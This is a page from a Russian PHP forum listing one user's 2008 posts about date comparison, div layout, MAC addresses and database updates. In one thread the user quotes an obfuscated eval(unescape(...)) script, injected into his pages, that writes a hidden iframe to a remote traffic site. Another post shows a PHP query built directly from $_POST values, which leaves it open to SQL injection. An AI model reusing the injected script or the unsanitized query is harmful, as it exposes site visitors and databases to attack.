PHP.SU

Программирование на PHP, MySQL и другие веб-технологии
PHP.SU Портал     На главную страницу форума Главная     Помощь Помощь     Поиск Поиск     Поиск Яндекс Поиск Яндекс     Вакансии  Пользователи Пользователи

Страниц (19): « 1 2 3 [4] 5 6 7 8 9 ... » В конец

> Найдено сообщений: 277
Mister Отправлено: 06 Апреля, 2008 - 20:02:06 • Тема: Сравнение дат • Форум: Программирование на PHP

Ответов: 5
Просмотров: 661
Спасибо! разобрался.
Mister Отправлено: 06 Апреля, 2008 - 19:59:26 • Тема: Помогите начинающему • Форум: Прочее

Ответов: 6
Просмотров: 73
Сначала надо задаться целью, что ты хочешь написать, а потом попутно по элементам всё разбирать и можно спросить у знающих людей если будут проблемы.
Mister Отправлено: 06 Апреля, 2008 - 16:09:54 • Тема: Сравнение дат • Форум: Программирование на PHP

Ответов: 5
Просмотров: 661
Подскажите, какими функциями можно сравнить даты? Смысл следующий: из базы данных извлекаются даты, и если дата уже прошла, то вывод в одну таблицу, а если нет то в другую.
И ещё в каком виде должен быть запрос на дату к базе данных? (Если можно простой пример такого запроса)
Mister Отправлено: 05 Апреля, 2008 - 05:50:41 • Тема: DIVовая верстка • Форум: HTML, Дизайн & CSS

Ответов: 15
Просмотров: 7144
Мне кажется для заказчика это показатель профессионализма и всё.
Mister Отправлено: 04 Апреля, 2008 - 21:10:41 • Тема: DIVовая верстка • Форум: HTML, Дизайн & CSS

Ответов: 15
Просмотров: 7144
А вот то что многим заказчикам требуется именно дивовая верстка, это зачем?
Mister Отправлено: 04 Апреля, 2008 - 15:01:02 • Тема: DIVовая верстка • Форум: HTML, Дизайн & CSS

Ответов: 15
Просмотров: 7144
Поделитесь опытом по поводу дивовой верстки, плюсы и минусы, особенности использования, что лучше табличная или дивовая?
Mister Отправлено: 04 Апреля, 2008 - 11:29:26 • Тема: Вирус на странице • Форум: Прочее

Ответов: 8
Просмотров: 116
Уже второй год пытаюсь, но хостинг не на меня оформлен, а на того на кого он оформлен, я ему уже 4 месяца пытаюсь объяснить, что такое хостинг и как с ним работать.
Спасибо за ответы, с одним хостингом всё-таки разобрался.
Mister Отправлено: 04 Апреля, 2008 - 10:46:16 • Тема: Вирус на странице • Форум: Прочее

Ответов: 8
Просмотров: 116
В общем на одном хостинге, где поддержка php есть после смены прав доступа ничего подобного больше нет.
А вот на хостинге, где поддержки php нет, я ни права доступа изменить не могу, ни пароли поменять, т.к. таких услуг хостер не предоставляет. Но сегодня туда опять этот скрипт подписался. И логи не могу там посмотреть, их там просто нет. А проблема пока осталась.
Mister Отправлено: 03 Апреля, 2008 - 16:00:09 • Тема: Вирус на странице • Форум: Прочее

Ответов: 8
Просмотров: 116
Ладно, попробую. Дело в том что происходит это на 2 хостингах. Один из них не даёт изменить прав доступа.
Mister Отправлено: 03 Апреля, 2008 - 15:53:52 • Тема: Вирус на странице • Форум: Прочее

Ответов: 8
Просмотров: 116
Подскажите, может кто-то сталкивался с таким:
Уже неделю борюсь с такой проблемой, ночью на страницу index постоянно в конец файла записывается следующий скрипт
eval(u n e s c a p e("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%2
7%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e
%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%2
0%6e%61%6d%65%3d%63%34%66%61%65%61%36%62%37%
63%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f
%2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6
%69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%6
4%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29
%2a%32%33%36%38%38%29%2b%27%31%35%64%32%64
%5c%27%20%77%69%64%74%68%3d%34%32%20%68%65
%69%67%68%74%3d%35%36%34%20%73%74%79%6c%65
%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%
6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));
Теги скрипт я убрал и переносы строки сделал. Каждый день его из всех страниц приходится удалять, подскажите как от этого избавиться?
Mister Отправлено: 07 Марта, 2008 - 16:20:25 • Тема: Функция работы с MAC - адресом • Форум: Программирование на PHP

Ответов: 5
Просмотров: 486
Мне надо как раз для защиты от чайников. Вы просто скажите как такая функция называется?
Mister Отправлено: 05 Марта, 2008 - 21:26:05 • Тема: Функция работы с MAC - адресом • Форум: Программирование на PHP

Ответов: 5
Просмотров: 486
Подскажите существует ли такая функция, которая позволяет определить MAC - адрес сетевого устройства или дайте ссылку на неё?
Mister Отправлено: 05 Марта, 2008 - 16:20:14 • Тема: Невозможность редактирования данных в базе данных • Форум: SQL и Архитектура БД

Ответов: 37
Просмотров: 294
Я вставлял кусок кода который мне дали всегда и ещё раз говорю что он ничего не выводит.
этот код ничего не выводит, пустое окно браузера.
После моих попыток пришёл только к такому, работает только если в запросе указывается изменение одного поля т.е.
PHP:
скопировать код в буфер обмена
  1. $query= mysql_query("update lichnie
  2.                    set familia='$_POST[familia]'
  3.                    where id_prepod='$_POST[id_prepod]';");

Если добавляю ещё поля то ничего не работает.
Mister Отправлено: 04 Марта, 2008 - 12:25:09 • Тема: Невозможность редактирования данных в базе данных • Форум: SQL и Архитектура БД

Ответов: 37
Просмотров: 294
Ладно, сегодня ещё в девятый раз перепишу скрипт и посмотрю в чём дело.
Mister Отправлено: 04 Марта, 2008 - 12:09:52 • Тема: Невозможность редактирования данных в базе данных • Форум: SQL и Архитектура БД

Ответов: 37
Просмотров: 294
Ничего не проясняется, это код я уже пробовал. Он не правильный, т.к. выдаётся сообщение об ошибке.

Страниц (19): « 1 2 3 [4] 5 6 7 8 9 ... » В конец
Powered by PHP  Powered By MySQL  Powered by Nginx  Valid CSS  RSS

 
Powered by ExBB FM 1.0 RC1. InvisionExBB